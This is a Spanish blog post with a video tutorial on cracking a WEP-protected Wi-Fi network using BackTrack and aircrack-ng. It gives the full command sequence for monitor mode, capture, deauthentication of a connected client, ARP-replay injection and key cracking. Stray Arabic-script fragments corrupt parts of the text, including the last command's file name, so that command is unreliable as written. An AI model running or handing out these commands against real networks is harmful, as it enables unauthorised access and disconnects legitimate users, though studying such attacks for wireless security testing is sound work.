Video Cracking WEP - Desasociando un cliente conectado al AP

En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vídeo.

Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.

Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección د باقويتيس.



Attack 0: Deauthentication + Attack 3: ARP Packets Injection = Key Found!! from delfirosales on Vimeo.

Comandos
root@bt:~# airmon-ng start wlan0

root@bt:~# airodump-ng mon0

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

root@bt:~# aircrack-ng captura-01.شاب
 
Vídeo Online
http://youtu.be/jUeBo2qBNJg?hd=1
Descargar Vídeo
http://www.mediafire.com/?q9doqdr2539c06b


Entradas populares de este blog

El mejor software libre para tu Terminal de Punto de Venta (TPV/POS)

Canaima 3 vs Windows 7: Una comparación detallada de ambos Sistemas Operativos

Cómo utilizar un USB como memoria RAM